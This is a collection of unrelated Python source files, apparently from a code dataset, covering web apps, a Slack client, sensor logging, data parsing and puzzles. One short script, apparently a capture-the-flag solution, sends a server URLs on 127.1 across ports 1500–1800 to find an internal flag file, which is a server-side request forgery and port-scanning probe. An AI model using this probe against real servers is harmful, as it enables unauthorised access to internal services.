return "請先爬取中獎名單!", 400
@app.route('/test')
def apptest():
return render_template('test.html')
if __name__ == "__main__":
app.config['ENV'] = "development"
app.config['DEBUG'] = True
app.run(port=3000) |
995,058 | 83a502277c9f9ec3095a97430065c1e691fbe18c | from django.apps import AppConfig
class VistorsConfig(AppConfig):
name = 'vistors'
|
995,059 | 36a6806024ae53da2faca67a92308a444ca8bd9f | import gspread
from oauth2client.service_account import ServiceAccountCredentials
scope=[
'https://www.googleapis.com/auth/spreadsheets',
'https://www.googleapis.com/auth/drive',
]
json_file_name='diesel-monitor-283800-7f744adca4c3.json'
credentials=ServiceAccountCredentials.from_json_keyfile_name(json_file_name,scope)
gc=gspread.authorize(credentials)
worksheet=gc.open("bob").worksheet("Sheet1")
#worksheet.update('A1',100)
#worksheet.update('B1',100)
|
995,060 | 785625ae82786beee6fd88fa00bc944259c4f7c7 | # uvicorn app_assetmgr:app --port 8001 --reload
|
995,061 | 58c7df059139cfcbc5d2f0f038e6ab36690d50e3 | data_path='/data4/jiali/data/iso_train'
import os
count=1
lstm1=0
lstm2=1
if lstm1:
dirs=os.listdir(data_path)
fimg=open('lstm_rgb_list.txt','w')
# fflow=open('lstm_flow.list.txt','w')
for dir in dirs:
files=os.listdir(os.path.join(data_path,dir))
for file in files:
count+=1
if count %10000==0:
print '{} files processed'.format(count)
if file.startswith('img'):
fimg.write(os.path.join(data_path,dir,file))
if lstm2:
with open('test_rgb_list.txt','r') as fr:
with open('test_lstm_rgb_list.txt','w') as fw:
lines=fr.readlines()
for line in lines:
count+=1
label=line.split(' ')[1]
# path=line.split(' ')[0].split('/')[-1]
tmp=os.path.join('/home/duanjiali/data/IsoGD/',line.split(' ')[0])
fw.write(tmp+' '+str(label))
if count %1000==0:
print '{} files procesed'.format(count)
|
995,062 | 9740e680777bcd1330a816fd5a5a29d5ca3dedaa | from .base import *
DEBUG = False
# Add any production-specific (but not server-specific) configuration here. |
995,063 | 473a6a86062c9ef3782a06651055420be02b14ac | import os
import numpy as np
import glob
import datetime
figures_dir = './figures'
import argparse
import time
if __name__ == '__main__':
ap = argparse.ArgumentParser()
ap.add_argument('min_h_since_modified', type=float, default=24, nargs='?')
ap.add_argument('-d', '--exp_dir', nargs='?', type=str, default='experiments', dest='experiments_root')
ap.add_argument('-f', '--filter', nargs='*', default=[], type=str,
help='List of terms to filter for (if multiple, they will be ANDed)')
ap.add_argument('-r', '--repeat_every', type=float, default=60, nargs='?')
args = ap.parse_args()
while True:
all_experiments_figs_dirs = []
# check all experiments in experiments_root for figures directories
for exp_dir in os.listdir(args.experiments_root):
if os.path.isdir(os.path.join(args.experiments_root, exp_dir)):
for sub_dir in os.listdir(os.path.join(args.experiments_root, exp_dir)):
# look only for the figures subdirectory in each experiment
if 'figures' in sub_dir and os.path.isdir(os.path.join(args.experiments_root, exp_dir, sub_dir)):
all_experiments_figs_dirs.append(os.path.join(args.experiments_root, exp_dir, sub_dir))
# get modified times for each figures directory
dir_modified_times = [datetime.datetime.fromtimestamp(os.path.getmtime(figs_dir)) for figs_dir in all_experiments_figs_dirs]
# sort dirs and dir modified times by modified time
sorted_dirs, sorted_times = [list(x) for x in zip(*sorted(zip(all_experiments_figs_dirs, dir_modified_times),
key=lambda dir_time_pair:dir_time_pair[1]))]
time_since_modified = [(datetime.datetime.now() - t) for t in sorted_times]
hours_since_modified = [t.days * 24 + t.seconds / 3600. for t in time_since_modified]
n_experiment_dirs = len(hours_since_modified)
# show at most the 10 most recently modified experiments
print('Hours since modified\tDir')
for i in range(max(n_experiment_dirs - 10, 0), n_experiment_dirs):
print('{}\t\t\t{}'.format(round(hours_since_modified[i], 1), sorted_dirs[i]))
latest_dirs = [d for i, d in enumerate(sorted_dirs) if hours_since_modified[i] < args.min_h_since_modified]
if len(args.filter) > 0:
latest_dirs = [d for d in latest_dirs if np.all([ft in d for ft in args.filter])]
model_names = [os.path.basename(os.path.split(ld)[0]) for ld in latest_dirs]
print('Combining images from each of {}'.format(model_names))
os.system('python ~/evolving_wilds/scripts/combine_images.py {} -out_names {}'.format(' '.join(latest_dirs),
' '.join(model_names)))
time.sleep(args.repeat_every)
|
995,064 | dc517a5f133292a0d6a0b5c39a942a3332d2a8d6 | import random
class Option():
def __init__(self):
self.file = [line.rstrip('\n').upper() for line in open('dictionary.txt', "r")]
SCRABBLES_SCORES = [(1, "E A O I N R T L S U"), (2, "D G"), (3, "B C M P"),
(4, "F H V W Y"), (5, "K"), (8, "J X"), (10, "Q Z"), (11, "Ą Ć Ę Ł Ń Ó Ś Ź Ż")]
global LETTER_SCORES
LETTER_SCORES = {letter: score for score, letters in SCRABBLES_SCORES
for letter in letters.split()}
def score_from_word(self,word):
score = 0
for w in word.upper():
if w in LETTER_SCORES.keys():
score += LETTER_SCORES.get(w)
return score
def score_from_file(self):
return max(sum(LETTER_SCORES[c] for c in word) for word in self.file)
def word_from_score(self,score):
valid_words = [word for word in self.file if sum([LETTER_SCORES[letter] for letter in word ]) == score]
if len(valid_words) != 0:
print(random.choices(valid_words))
else:
print('')
|
995,065 | ab78e04fe58d97daae7e712729aa9a4ff0ed9fc4 | from django.urls import path, include
from pomelo.settings import api_settings
from .views import ImageViewSet
RouterClass = api_settings.DEFAULT_ROUTER
router = RouterClass()
router.register('image', ImageViewSet)
urlpatterns = [
path('', include((router.urls, 'pomelo'), namespace='pomelo')),
]
|
995,066 | d7d5f3532d0f4c70c77606c64877313e0d432137 | import requests
from bs4 import BeautifulSoup
class Solution:
def __init__(self):
self.req = requests.session()
self.url = ""#server url include port
self.res = ""
def sendP(self, data):
self.res = self.req.post(url=self.url, data=data)
def checkSuc(self, res):
if res.status_code == 200:
bhtml = BeautifulSoup(res.text, "html.parser")
par = bhtml.select('img')
return par[0]['src']
return False
if __name__ == '__main__':
sol = Solution()
url = "http://127.1:1500/app/flag.txt"
sol.sendP({'url':url})
out = sol.checkSuc(sol.res)
print(out)
spec = out
for i in range(1500, 1801):
url = "http://127.1:"+str(i)+"/app/flag.txt"
sol.sendP({'url':url})
print(url)
out = sol.checkSuc(sol.res)
if spec != out:
print('find!!\nPORT: ' + str(i))
break
|
995,067 | 47d7f20548a40f5b5de3950ec22ca17a28346dea | # BeagleBone Black Health Sensors
# Autores: Mario Baldini, Joao Baggio, Raimes Moraes
import smbus
from time import sleep
import sys
import driver_adxl345_bus1 as ADXL345_bus1
import driver_adxl345_bus2 as ADXL345_bus2
## BEGIN
adx1 = ADXL345_bus1.new(1, 0x1D) #adxl345_bus1_add53
adx2 = ADXL345_bus1.new(1, 0x53) #adxl345_bus1_add53
adx3 = ADXL345_bus2.new(2, 0x1D) #adxl345_bus1_add53
adx4 = ADXL345_bus2.new(2, 0x53) #adxl345_bus1_add53
print "Column 1-3:\tADXL 345, I2C Bus: 1, Address 0x53; Format: x,y,z; +/-0.000 G"
print "Column 4-6:\tADXL 345, I2C Bus: 1, Address 0xXX; Format: x,y,z; +/-0.000 G"
print "Column 7-9:\tADXL 345, I2C Bus: 2, Address 0x53; Format: x,y,z; +/-0.000 G"
print "Column 10-12:\tADXL 345, I2C Bus: 2, Address 0xXX; Format: x,y,z; +/-0.000 G"
axes1 = { 'x':0 , 'y':0, 'z':0 }
axes2 = { 'x':0 , 'y':0, 'z':0 }
axes3 = { 'x':0 , 'y':0, 'z':0 }
axes4 = { 'x':0 , 'y':0, 'z':0 }
while (True):
# print "%.3f" % ( axes['x'] ), "%.3f" % ( axes['y'] ), "%.3f" % ( axes['z'] )
#axes1 = adx1.getAxes(True)
axes1 = adx1.getAxes(True)
axes2 = adx2.getAxes(True)
axes3 = adx3.getAxes(True)
axes4 = adx4.getAxes(True)
sys.stdout.write("%.3f," % ( axes1['x'] ))
sys.stdout.write("%.3f," % ( axes1['y'] ))
sys.stdout.write("%.3f," % ( axes1['z'] ))
sys.stdout.write("\t")
sys.stdout.write("%.3f," % ( axes2['x'] ))
sys.stdout.write("%.3f," % ( axes2['y'] ))
sys.stdout.write("%.3f," % ( axes2['z'] ))
sys.stdout.write("\t")
sys.stdout.write("%.3f," % ( axes3['x'] ))
sys.stdout.write("%.3f," % ( axes3['y'] ))
sys.stdout.write("%.3f," % ( axes3['z'] ))
sys.stdout.write("\t")
sys.stdout.write("%.3f," % ( axes4['x'] ))
sys.stdout.write("%.3f," % ( axes4['y'] ))
sys.stdout.write("%.3f," % ( axes4['z'] ))
sys.stdout.write("\n")
sys.stdout.flush()
sleep (0.150) # ms
|
995,068 | f9090a37c3b354a84d7d0678a47dd0ae63513cb2 | # -*- coding:utf-8 -*-
from sys import argv
import requests
EXAMPLE="""
Eg:python test_argv.py http://www.baidu.com
"""
if len(argv) !=2:
print EXAMPLE
exit()
script_name,url=argv
if url[0:4] !="http":
url=r"http://"+url
r=requests.get(url)
print u"接口地址:"+url
print u"状态码:"+str(r.status_code)
print "headers:"
for key,value in r.headers.items():
print key,value
|
995,069 | 14163e7316cf86d61862e81440723eb764eb6263 | #!/usr/bin/env python3
import asyncio
import os
import re
import sys
from PyQt5 import QtWidgets
from quamash import QEventLoop
from slack import RTMClient
from slack import WebClient
from MainWindow import Ui_PyQT5SlackClient
# import logging
# logging.basicConfig(level=logging.DEBUG)
slack_api_token = os.environ["SLACK_API_TOKEN"]
slack_bot_token = os.environ["SLACK_BOT_TOKEN"]
class MainWindow(QtWidgets.QMainWindow, Ui_PyQT5SlackClient):
def __init__(self, *args, web_client=None, rtm_client=None, **kwargs):
super().__init__()
self.web_client = web_client
self.rtm_client = rtm_client
self.setupUi(self)
self.chan_list: list = []
self.chan_name_list: list = []
self.pushButton.clicked.connect(self.button_click_send_message)
self.pushButton.setEnabled(False)
self.listWidget.itemClicked.connect(self.channel_item_clicked)
self.current_channel_id: str = ""
self.user_info_cache = {}
self.bots_info_cache = {}
loop.create_task(self.get_conversation_list())
loop.create_task(self.rtm_main())
async def rtm_main(self):
await asyncio.sleep(1)
await rtm_client.start()
@RTMClient.run_on(event="message")
async def message_received(**payload):
data = payload['data']
user_id = data['user']
content = data['text']
await mainWindow.append_message_to_chat(user_id=user_id, content=content)
def button_click_send_message(self) -> None:
message = self.textEdit.toPlainText()
channel = self.current_channel_id
loop.create_task(self.send_message_async(channel=channel,
message=message))
self.textEdit.clear()
async def send_message_async(self, channel: str, message: str) -> None:
await self.web_client.chat_postMessage(channel=channel, text=message)
async def get_history(self, chan_id):
self.textBrowser.clear()
history = await self.web_client.conversations_history(channel=chan_id)
history_messages = history['messages']
history_messages.reverse()
for message in history_messages:
if 'type' in message.keys():
if 'subtype' in message.keys():
if message['subtype'] == 'bot_message':
# print("processing bot message: {}".format(message))
if 'username' in message.keys():
content: str = message['username'] + ": " + message['text']
else:
content = message['text']
if 'attachments' in message.keys():
for attachment in message['attachments']:
if 'fallback' in attachment.keys():
content = content + attachment['fallback']
user_id = message['bot_id']
await self.append_message_to_chat(content=content,
user_id=user_id)
# else:
# print("unhandled subtype type: {}".format(message))
if 'user' in message.keys():
# print("processing message: {}".format(message))
content = message['text']
user_id = message['user']
await self.append_message_to_chat(content=content, user_id=user_id)
else:
print("unhandled message type: {}".format(message))
async def append_message_to_chat(self, content, user_id):
if re.match("^U.*", user_id, flags=re.IGNORECASE):
user_real_name = await self.get_user_real_name(user_id=user_id)
else:
user_real_name = await self.get_bots_real_name(bot_id=user_id)
if "<@{}>".format(user_id) in content:
content = content.replace("<@{}>".format(user_id), user_real_name)
else:
for at_user in re.findall(r'<@U.*?>', content):
at_user_id = at_user.replace('<@', '').replace('>', '')
at_user_name = await self.get_user_real_name(user_id=at_user_id)
content = content.replace(
at_user, "@" + at_user_name)
content = "{}: {}".format(user_real_name, content)
self.textBrowser.append(content)
async def get_user_real_name(self, user_id):
user_info = await self.get_user_info(user_id=user_id)
if "profile" in user_info.keys():
return user_info['profile']['real_name']
elif "real_name" in user_info.keys():
return user_info['real_name']
else:
print("Failed to get real name: {}".format(user_info))
return "Unknown User"
async def get_bots_real_name(self, bot_id):
# print("getting bot info: {}".format(bot_id))
bots_info = await self.get_bots_info(bot_id=bot_id)
# print("bots info: {}".format(bots_info))
if 'user_id' in bots_info['bot'].keys():
user_id = bots_info['bot']['user_id']
bot_user_name = await self.get_user_real_name(user_id=user_id)
return bot_user_name
elif 'name' in bots_info['bot'].keys():
return bots_info['bot']['name']
else:
print("Failed to get bot name: {}".format(bot_id))
return "unknown bot user"
async def get_user_info(self, user_id):
if user_id not in self.user_info_cache:
user_info_resp = await self.web_client.users_info(user=user_id)
self.user_info_cache[user_id] = user_info_resp['user']
return self.user_info_cache[user_id]
async def get_bots_info(self, bot_id):
if bot_id not in self.bots_info_cache:
bots_info_resp = await self.web_client.bots_info(bot=bot_id)
# print("raw bot info: {}".format(bots_info_resp))
self.bots_info_cache[bot_id] = bots_info_resp
return self.bots_info_cache[bot_id]
async def get_conversation_list(self):
conversation_list = await self.web_client.conversations_list(exclude_archived=1)
channels = conversation_list['channels']
self.chan_list = channels
self.listWidget.clear()
for chan in channels:
if chan['is_member']:
self.chan_name_list.append(str(chan['name']))
self.chan_name_list.sort()
for name in self.chan_name_list:
self.listWidget.addItem(name)
def channel_item_clicked(self, item) -> None:
chan_name = item.text()
chan_info_list = [element for element in self.chan_list
if element['name'] == chan_name]
chan_info = chan_info_list[0]
self.current_channel_id = chan_info['id']
self.pushButton.setEnabled(True)
loop.create_task(self.get_history(self.current_channel_id))
app = QtWidgets.QApplication(sys.argv)
loop = QEventLoop(app)
asyncio.set_event_loop(loop)
web_client = WebClient(token=slack_api_token, run_async=True, loop=loop)
rtm_client = RTMClient(token=slack_bot_token, connect_method='rtm.start',
run_async=True, loop=loop)
future = rtm_client.start()
with loop:
mainWindow = MainWindow(web_client=web_client, rtm_client=rtm_client)
mainWindow.show()
loop.run_forever()
|
995,070 | 8de74df84dd61c8a8e593dc7cac53525e85183ca | from commands.help import HelpCommand
from commands.toons import ToonsCommand
from commands.ships import ShipsCommand
from commands.members import MembersCommand
from commands.guild_member import GuildMemberCommand
from commands.member_toon import MemberToonCommand
from commands.member_ship import MemberShipCommand
from commands.zetas import ZetasCommand
from commands.cls_ready import CLSReadyCommand
from commands.jtr_ready import JTRReadyCommand
from commands.thrawn_ready import ThrawnReadyCommand
from commands.lstbplatoons import LSTBPlatoonsCommand
class CommandInterpreter(object):
def __init__(self):
self.commands = {}
self.populate_commands()
def populate_commands(self):
self.commands['help'] = HelpCommand('help')
self.commands['toons'] = ToonsCommand('toons')
self.commands['ships'] = ShipsCommand('ships')
self.commands['members'] = MembersCommand('members')
self.commands['guild-member'] = GuildMemberCommand('guild-member')
self.commands['member-toon'] = MemberToonCommand('member-toon')
self.commands['member-ship'] = MemberShipCommand('member-ship')
self.commands['zetas'] = ZetasCommand('zetas')
self.commands['cls-ready'] = CLSReadyCommand('cls-ready')
self.commands['jtr-ready'] = JTRReadyCommand('jtr-ready')
self.commands['thrawn-ready'] = ThrawnReadyCommand('thrawn-ready')
self.commands['lstbplatoons'] = LSTBPlatoonsCommand('lstbplatoons')
def interpret(self, name):
try:
return self.commands[name]
except KeyError:
return self.commands['help']
|
995,071 | e5d422863f485bd97b05064fee917231e296c4e0 | import argparse
import sys
import os
import logging
import ConfigParser
import json
import copy
WORKDIR = os.path.realpath(os.path.dirname(sys.argv[0]))
def init_logger(log_file_name, log_base_path=None, log_level=None,
logger_name=None, print_to_console=None):
if log_base_path is None:
log_base_path = r"\var\log"
if log_level is None:
log_level = logging.INFO
if logger_name is None:
logger_name = 'default'
if print_to_console is None:
print_to_console = False
logger = logging.getLogger(logger_name)
format_str = '%(asctime)s %(levelname)s\t%(module)s:%(lineno)d: %(message)s'
formatter = logging.Formatter(format_str)
log_full_path = os.path.join(log_base_path, log_file_name)
global_handler = logging.FileHandler(log_full_path)
global_handler.setFormatter(formatter)
logger.addHandler(global_handler)
if print_to_console:
soh = logging.StreamHandler(sys.stdout)
soh.setLevel(logging.DEBUG)
soh.setFormatter(formatter)
logger.addHandler(soh)
logger.setLevel(log_level)
return logger
def parse_cmd_arguments(custom_args):
parser = argparse.ArgumentParser(description="")
parser.add_argument("-json_db", default="json_db.json",
help="json db input for parser")
args, _ = parser.parse_known_args(custom_args)
return args
def parse_input_arguments(custom_args):
"""
parse_input_arguments() -> config_dict: [dict]
"""
try:
config = ConfigParser.ConfigParser()
conf_file = os.path.basename(__file__).split('.py')[0] + '.conf'
conf_file = os.path.join(WORKDIR, conf_file)
config.read(conf_file)
conf_dict = config.__dict__['_sections'].copy()
except Exception, e:
conf_dict = {}
print "Config_dict wasn't found, running without it \n Exception:%s" % e
args = parse_cmd_arguments(custom_args)
conf_dict['run'] = {}
conf_dict['cmd'] = {}
conf_dict['cmd']['json_db'] = args.json_db
conf_dict['LOGGER'] = LOGGER
return conf_dict
def json_2_dict(conf_dict):
json1_file = open(conf_dict['cmd']['json_db'])
json1_str = json1_file.read()
return json.loads(json1_str)
def db_parser(json_db):
file_list = json_db['files']
adict = {'sha_list': [], 'file_count': 0, 'oldest': None}
result_dict = {'exe': copy.deepcopy(adict), 'pdf': copy.deepcopy(adict),
'py': copy.deepcopy(adict)}
for i, afile in enumerate(file_list):
file_type = afile['file_type']
file_sha = afile['sha256']
date = afile['date']
if file_sha not in result_dict[file_type]['sha_list']:
result_dict[file_type]['sha_list'].append(file_sha)
result_dict[file_type]['file_count'] += 1
if result_dict[file_type]['oldest']:
if date < result_dict[file_type]['oldest']:
result_dict[file_type]['oldest'] = date
else:
result_dict[file_type]['oldest'] = date
for file_type, values in result_dict.iteritems():
pline = "\tfiles_type: %s\toccurrences: %s\toldest_entry: %s" \
% (file_type, values['file_count'], values['oldest'])
LOGGER.info(pline)
return result_dict
def main(custom_args=None):
conf_dict = parse_input_arguments(custom_args)
if not conf_dict:
return 1
conf_dict['json_db'] = json_2_dict(conf_dict)
conf_dict['result'] = db_parser(conf_dict['json_db'])
return 0
if __name__ == '__main__':
LOGGER = init_logger(os.path.basename(__file__) + '.log',
log_base_path='%s' % WORKDIR,
print_to_console=True, log_level=logging.DEBUG)
LOGGER.info('start' + os.path.basename(__file__))
exit_status = main()
LOGGER.info('exit status = %s' % exit_status)
LOGGER.info('end' + os.path.basename(__file__))
sys.exit(exit_status) |
995,072 | 181f7f37abaf2506bb08747bd42b5c75b9f79856 | """
Given a non-negative integer num, Return its encoding string.
The encoding is done by converting the integer to a string using a secret function that you should deduce from the following table:
Example 1:
Input: num = 23
Output: "1000"
Example 2:
Input: num = 107
Output: "101100"
Constraints:
0 <= num <= 10^9
"""
# 000, 001,010,011,100,101,110,111,0000,0001,0010,0011,0100,0101,0110,0111,1000
# convert the num + 1 into binary and drop the most significant digit
class Solution:
def encode(self, num: int) -> str:
if num == 0: return ""
num += 1
res = bin(num)[3:]
return str(res)
|
995,073 | 9e1e30fda2373e7eb0a3fc2d4f8428cf5f42fad8 | from case.interfacetest import InterfaceTestCase
if __name__ == '__main__':
app = InterfaceTestCase()
app.runAllCase("xd") |
995,074 | c0988a8a6286437ad6d1846cbe4af286c06e92b6 | def binarySearch(target):
left, right = 0, len(nums) - 1
while left < right:
mid = left + (right - left) // 2
if target <= nums[mid]:
right = mid
else:
left = mid + 1
return left
1. if the array has duplicates, this will return 1st occurance of the target
[9,9,9,9] -> ans will be 0
2. if target > nums[-1], it will return last index
3. if target < nums[0], it will return 0
4. if you find a match, left==right==mid
5. if you don't find a match, it will return insert location
|
995,075 | 6f4e560e6e7702eaab69d5692558b31d3581889a | #Timedelta function demo
from datetime import datetime, timedelta
#timedelta has 3 attributes
print("Max:", timedelta.max) #the most positive timedelta object, timedelta(days=999999999,hours=23),minues=59,seconds=59,microseconds=999999)
print("Min:", timedelta.min) #the most negative timedelta bject,timedelta(-999999999)
print("Resolution:", timedelta.resolution) #the smallest psossible differnce between non-equal timedelta objects, timedelta(microseconds=1)
#using current time
current_date_time=datetime.now()
#printing initial date
print("initial_date", current_date_time)
#calculating future dates
#for one year
future_date_after_1yr=current_date_time + timedelta(days=365)
#for 4 days and time
future_date_after_4days=current_date_time + timedelta(days=4, hours=5, minutes=4, seconds=54)
# print calculated furture dates
print("future date after 1 year", future_date_after_1yr)
print("future date after 4 days", future_date_after_4days)
print("Type:", type(future_date_after_4days))
#convert string
future_date_after_1yr_str=str(future_date_after_1yr)
future_date_after_4days_str=str(future_date_after_4days)
print("future date after 1 year", future_date_after_1yr_str)
print("future date after 4 days", future_date_after_4days_str)
print("Type:", type(future_date_after_4days_str))
|
995,076 | f47fec488fb6878c7723ad88505ea1f23db7b97b | """
Module description ...
Reference:
- Surename1, Forename1 Initials., Surename2, Forename2 Initials, YEAR. Publication/Book title
Publisher, Number(Volume No), pp.142-161.
"""
import numpy as np
import matplotlib.pyplot as plt
def draw_lagrangian_descriptor(LD, LD_type, grid_parameters, tau, p_value, norm = True, colormap_name='bone', colormap_mode=1):
"""
Draws a Lagrangian descriptor contour plot and a contour plot showing the magnitude of its gradient field.
Parameters
----------
LD : ndarray, shape(n, )
Array of Lagrangian Descriptor values.
LD_type : str
Type of LD to plot. Options: 'forward', 'backward', 'total'.
grid_parameters : list of 3-tuples of floats
Limits and size of mesh per axis.
tau : float
Upper limit of integration.
p_value : float
Exponent in Lagrangian descriptor definition.
norm : bool, optional
True normalises LD values.
colormap_name : str, optional
Name of matplotlib colormap for plot.
Returns
-------
Nothing.
"""
if type(grid_parameters) == dict:
#n-DoF systems
slice_parameters = grid_parameters['slice_parameters'] # 2n-D grid
dims_slice = np.array(grid_parameters['dims_slice'])
slice_axes_labels = np.array(['$x$','$y$','$p_x$','$p_y$'])
slice_axes_labels = slice_axes_labels[dims_slice==1]
else:
#1-DoF systems
slice_parameters = grid_parameters # 2-D grid
slice_axes_labels = ['$x$', '$p_x$']
ax1_min, ax1_max, N1 = slice_parameters[0]
ax2_min, ax2_max, N2 = slice_parameters[1]
if norm:
LD = LD - np.nanmin(LD) # Scale LD output
LD = LD / np.nanmax(LD) # Scale LD output
# Plot LDs
fig, (ax0, ax1) = plt.subplots(1, 2, figsize=(7.5,3), dpi=200)
points_ax1 = np.linspace(ax1_min, ax1_max, N1)
points_ax2 = np.linspace(ax2_min, ax2_max, N2)
if colormap_mode == 1:
vmin, vmax = LD.min(), LD.max()
elif colormap_mode == 2:
vmin = LD.mean()-LD.std()
vmax = LD.max()
con0 = ax0.contourf(points_ax1, points_ax2, LD, cmap=colormap_name, vmin=vmin, vmax=vmax, levels=200)
# Customise appearance
if p_value == 2:
str_method = 'arclength - '
elif p_value >= 1:
str_method = r'p-norm $(p={})$'.format(p_value)
elif p_value == 0:
str_method = 'action-based'
elif p_value < 1:
str_method = r'LD$_p$ $(p={})$'.format(p_value)
t_final=abs(tau)
if LD_type == 'forward':
string_title = r'Forward LD {}, $\tau={}$'.format(str_method,t_final)
elif LD_type == 'backward':
string_title = r'Backward LD {}, $\tau={}$'.format(str_method,t_final)
elif LD_type == 'total':
string_title = r'Total LD {}, $\tau={}$'.format(str_method,t_final)
else:
string_title = ''
print('Incorrect "LD_type". Valid options: forward, backward, total. Plot will appear without title')
fig.suptitle(string_title, fontsize=14, y=1.04)
ax0.set_title('LD values')
ax0.set_xlabel(slice_axes_labels[0])
ax0.set_ylabel(slice_axes_labels[1])
ticks_LD = np.linspace(np.nanmin(LD), np.nanmax(LD), 11)
fig.colorbar(con0, ax=ax0, ticks=ticks_LD, format='%.2f')
gradient_x, gradient_y = np.gradient( LD, 0.05, 0.05)
gradient_magnitude = np.sqrt(gradient_x**2 + gradient_y**2)
gradient_magnitude = gradient_magnitude/gradient_magnitude.max()
con1 = ax1.contourf(points_ax1, points_ax2, gradient_magnitude, cmap='Reds', levels=200)
ax1.set_title('LD gradient magnitude')
ax1.set_xlabel(slice_axes_labels[0])
ax1.label_outer()
ticks_gradient = np.linspace(np.nanmin(gradient_magnitude), np.nanmax(gradient_magnitude), 11)
fig.colorbar(con1, ax=ax1, ticks=ticks_gradient, format='%.2f')
plt.show()
__author__ = 'Broncio Aguilar-Sanjuan, Victor-Jose Garcia-Garrido, Vladimir Krajnak'
__status__ = 'Development'
|
995,077 | e3e15e2e47e5dba468c4bc5080a90c81268a8366 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# call functions
abs(-100)
max(1, 2)
int('123')
int(12.34)
float('12.34')
str(100)
bool(1)
bool(-1)
bool(0)
bool('')
bool(None)
a = abs
a(-1)
# define a function
def my_abs(x):
if x >= 0:
return x
else:
return -x
my_abs(-0.5)
# empty function (pass for do nothing)
def nop():
pass
age = 0
if age >= 18:
pass
# check the parameters
abs('A')
my_abs('A')
my_abs(1, 2)
def my_abs(x):
if not isinstance(x, (int, float)):
raise TypeError('bad openrand type')
if x >= 0:
return x
else:
return -x
my_abs('A')
# function return two values
import math
def move(x, y, step, angle=0):
nx = x + step * math.cos(angle)
ny = y - step * math.sin(angle)
return nx, ny
x, y = move(100, 100, 60, math.pi/6)
print(x, y)
r = move(100, 100, 60, math.pi/6)
print(r) # the return of the move is actually a tuple
# using default parameter
def power(x, n=2):
result = 1
while n > 0:
result = result * x
n = n - 1
return result
power(3, 0)
power(3)
# use None as the default parameter
def add_end(L=[]):
L.append('END')
return L
add_end([1, 3, 4])
add_end()
add_end()
add_end()
def add_end(L=None):
if L is None:
L = []
L.append('END')
return L
add_end([1, 3, 4])
add_end()
add_end()
add_end()
# using changeable parameter
def calc(numbers):
result = 0
for i in numbers:
result = result + i ** 2
return result
calc([2, 3, 4])
calc(2, 3, 4)
def calc(*numbers):
result = 0
for i in numbers:
result = result + i ** 2
return result
calc(2, 3, 4)
calc([2, 3, 4])
calc(*[2, 3, 4]) # use * to return all the element of a list
# using key word parameters
def person(name, age, **kw):
print('name:', name)
print('age:', age)
print('others:', kw)
person('Bob', 14)
person('Bob', 14, city='Beijing')
person('Ken', 26, city='HOng Kong', job="Engineer")
extra = {'city': 'Beijing', 'job': 'Engineer'}
person('Jack', 20, city=extra['city'], job=extra['job'])
person('Jack', 20, **extra)
# name the key word parameter
person('Ken', 26, city='Hong Kong', job="Engineer", addr='Wahahahha')
def person(name, age, *, city='Beijing', job):
print('name:', name)
print('age:', age)
print('city:', city)
print('job:', job)
person('Ken', 26, city='Hong Kong', job="Engineer")
person('Ken', 26, job="Engineer")
person('Ken', 26)
person('Ken', 26, city='Hong Kong', job="Engineer", addr='Wahahahha')
person('Ken', 26, 'Hong Kong', "Engineer")
# comparison
# *args is a changeable parameter, it receives a tuple. **kw is a keyword parameter, it receives a dict
def f1(a, b, c=0, *args, **kw):
print('a:', a)
print('b:', b)
print('c:', c)
print('args:', args)
print('kw:', kw)
f1(1, 2)
f1(1, 2, 3)
f1(1, 2, 3, 4)
f1(1, 2, 3, 4, 5)
f1(1, 2, 3, [4, 5, 6])
f1(1, 2, 3, *[4, 5, 6])
f1(1, 2, 3, *[4, 5, 6], 7)
f1(1, 2, 3, 4, kw1=3)
f1(1, 2, 3, 4, kw1=3, kw2=4)
f1(1, 2, 3, 4, 5, kw1=3, kw2=4)
f1(1, 2, 3, kw1=3, kw2=4)
# kw0 is a named keyword parameter, it receives a dict
def f2(a, b, c=0, *, kw0, **kw):
print('a:', a)
print('b:', b)
print('c:', c)
print('args:', kw0)
print('kw:', kw)
f2(1, 2)
f2(1, 2, kw0=4)
f2(1, 2, 3, kw0=4)
f2(1, 2, 3, kw0=[1, 2])
# f2(1, 2, 3, kw0=*[1, 2])
f2(1, 2, 3, kw0=4, kw1=7)
ARGS1 = (1, 2, 3, 4)
KW1 = {'kw1': 9, 'kw2': 10}
f1(*ARGS1, **KW1)
ARGS2 = (1, 2, 3)
KW2 = {'kw0': 7, 'kw1': 9, 'kw2': 10}
f2(*ARGS2, **KW2)
'''
*args是可变参数,args接收的是一个tuple;
**kw是关键字参数,kw接收的是一个dict。
以及调用函数时如何传入可变参数和关键字参数的语法:
可变参数既可以直接传入:func(1, 2, 3),又可以先组装list或tuple,再通过*args传入:func(*(1, 2, 3));
关键字参数既可以直接传入:func(a=1, b=2),又可以先组装dict,再通过**kw传入:func(**{'a': 1, 'b': 2})。
使用*args和**kw是Python的习惯写法,当然也可以用其他参数名,但最好使用习惯用法。
'''
# recursion function
def fact(n):
if n==1:
return 1
return n * fact(n - 1)
fact(5)
fact(1000)
def fact(n):
return fact_iter(n, 1)
def fact_iter(num, product):
if num == 1:
return product
return fact_iter(num - 1, num * product)
fact(5)
fact(100)
'''
汉诺塔的移动可以用递归函数非常简单地实现。
请编写move(n, a, b, c)函数,它接收参数n,表示3个柱子A、B、C中第1个柱子A的盘子数量,然后打印出把所有盘子从A借助B移动到C的方法,例如:
'''
def move(n, a, b, c):
if n == 1:
print(a, '--->', c)
else:
move(n-1, a, c, b)
move(1, a, b, c)
move(n-1, b, a, c)
move(3, 'A', 'B', 'C')
'''
calculate a^b
'''
def power(x, n):
if n == 0:
return 1
interm_result = power(x, n//2)
if n % 2 == 0:
return interm_result * interm_result
return x * interm_result * interm_result
power(2, 3)
'''
print every subset of a given set
'''
def print_subset(X, cur=[], index=0):
if index == len(X):
print(cur)
return
cur.append(X[index])
print_subset(X, cur, index+1) # breaking point
cur.pop()
print_subset(X, cur, index+1) # breaking point
X = a b c
cur = []
index = 0
print_subset(["A", "B", "C", "D"])
print_subset(["A", "B", "C"])
print_subset(["A", "B"])
print_subset(["A"])
|
995,078 | 6e530c48cd9902189f2bbbb7a98ff652eca2b7e2 | # -*- coding: utf-8 -*-
"""
Created on Sat Jul 04 14:50:28 2015
Given an array S of n integers, are there elements a, b, c in S
such that a + b + c = 0? Find all unique triplets in the array which
gives the sum of zero.
Note:
Elements in a triplet (a,b,c) must be in non-descending order. (ie, a ≤ b ≤ c)
The solution set must not contain duplicate triplets.
For example, given array S = {-1 0 1 2 -1 -4},
A solution set is:
